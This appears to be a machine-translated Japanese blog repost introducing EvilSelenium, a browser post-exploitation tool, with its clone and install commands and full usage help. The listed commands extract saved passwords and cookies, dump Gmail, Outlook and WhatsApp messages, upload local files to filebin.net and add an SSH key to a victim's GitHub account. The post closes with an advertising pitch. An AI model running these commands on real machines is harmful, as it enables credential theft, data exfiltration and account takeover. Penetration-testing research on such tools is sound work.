EvilSelenium: 強力な Chromium ブラウザ侵入テスト ツール

邪悪なセレンについて

EvilSelenium は
Selenium
ベースの侵入テスト ツールであり、兵器化された Selenium に基づいて機能を実装しており、研究者が Chromium ベースのブラウザのセキュリティ分析と侵入テストを実施するのに役立ちます。

特徴

1. 自動入力を通じて、保存されている認証情報を取得します。

2. Cookie データを取得します。

3. Web サイトのスクリーンショットを撮ります。

4. Gmail/O365 電子メール データをエクスポートします。

5. WhatsApp メッセージをエクスポートします。

6. ファイル情報をダウンロードして抽出します。

7. SSH キーを GitHub に追加します。

あるいは、大多数の研究者は、ユーザーの GDrive/OneDrive からファイルをダウンロードするなど、自分のニーズに応じてツールの機能を拡張することもできます。

予防

1. ツールの実行中、パスワードやアクティブなセッションを含むユーザーのブラウザ データを取得するために、現在のデバイス上で実行中のブラウザ プロセスがあるかどうかを判断します。

2. Selenium モジュールはあまり安定していないため、Web サイトの変更に伴い、一部のモジュールの動作が時々中断されることがあります。

ツールのダウンロード

研究者は次のコマンドを使用して、プロジェクトのソース コードをローカルに複製できます。

git clone https://github.com/mrd0x/EvilSelenium.git

ツールのインストール

「/install」コマンドを使用して、
EvilSelenium の実行に必要な Chrome ドライバーと Selenium WebDriver をダウンロードできます。EvilSelenium は Chrome v100-90 をサポートしています。

この方法は、Windows 10、Chrome v97、v90 でテストされています。

EvilSelenium.exe /install

ツールのヘルプ情報

EvilSelenium.exe /?

 

/help - Show this help menu.

 

SETUP:

/install - Install chromedriver & Selenium webdriver. Run this once.

 

GLOBAL: (accepted with every command)

/browserdir [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")

 

RECON:

/enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s).

/screenshot [website] [out_path] - Screenshot a given webpage.

 

CREDENTIALS:

/autorun - Extract saved credentials from common websites.

/dynamicid [login_page] [username_id] [password_id] - Extract saved credentials from a website, providing the username field ID & password field ID.

/dynamicname [login_page] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value & password name value.

/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value, password name value and their positions.

 

COOKIES:

/cookies [website] - Grabs cookies for a given website.

 

MODULES:

/download [file_url] [seconds] - Downloads a file and specify time to wait for download to finish. File extensions should not be executable.

/exfil [local_file] [seconds] - Uploads a file on filebin.net and outputs the download link.

/gmail [out_path] [num_of_emails] - Fetches emails from mail.google.com if user is authenticated. Max 50 emails.

/outlook [out_path] [num_of_emails] - Fetches emails from Outlook if user is authenticated.

/o365 [out_path] [num_of_emails] - Fetches emails from O365 Outlook if user is authenticated.

/github [key] - Add your SSH key to Github if user is authenticated.

/whats*app [out_path] - Fetches Whats*app messages if user is authenticated (BETA).

ツールの構成と使用法

グローバル構成

デフォルトでは、EvilSelenium は Google Chrome のユーザー データ フォルダーを使用してデータを取得しようとします。また、他の Chromium ベースのブラウザーもこの機能をサポートしています。

別の Chrome ベースのブラウザを使用する場合は、「%localappdata%」ディレクトリに次の内容を追加する必要があります (一部の一般的なブラウザ)。

# Brave

/browserdir BraveSoftware\Brave-Browser


# Microsoft Edge

/browserdir Microsoft\Edge


# Vivaldi

/browserdir Vivaldi

ネットワーク偵察モジュール

/enumsavedsites - 获取“chrome://settings/passwords”的屏幕截图。

/screenshot - 获取任意网站的屏幕截图。

資格情報モジュール

/autorun - 针对常用网站的预构建模版。

/dynamicid - 提供包含了用户名输入字段ID和密码字段ID的登录URL。

/dynamicname - 如果字段不包含ID,则提供字段的name值。

/dynamicname2 - 提供字段的name值以及索引位置。

クッキーモジュール

/cookies - 从指定网站导出Cookie数据。

その他のモジュール

このツールでサポートされる追加モジュールをいくつか以下に示します。

/download - 下载文件&指定等待下载的时间。

/exfil - 向filebin.net上传一个文件&指定上传完成的等待时间。上传完成后,写入文件下载链接。

/gmail - 用户认证后,从mail.google.com获取电子邮件,电子邮件最大数量为50

/outlook - 用户认证后,从Outlook获取电子邮件。

/o365 - 用户认证后,从O365 Outlook获取电子邮件。

/github - 用户认证后,向GitHub添加SSH密钥。

/whats*app - 用户认证后,获取Whats*App消息。

ツールのデモ

やっと

ネットワーク セキュリティに触れたことのない学生のために、詳細な学習と成長のロードマップを用意しました。これは最も科学的で体系的な学習ルートであると言え、誰もがこの大まかな方向に従うことに問題はありません。

同時に、成長ルートに応じたセクションごとのサポートビデオも用意されています。


サポートビデオはもちろん、さまざまなドキュメント、書籍、資料、ツールが整理され、カテゴリに分類されています。あなた。

スペースに限りがあるため、情報の一部のみが表示されます。必要な友達は [下の QR コードをスキャン] して無料で入手できます。

おすすめ

転載: blog.csdn.net/text2206/article/details/130108460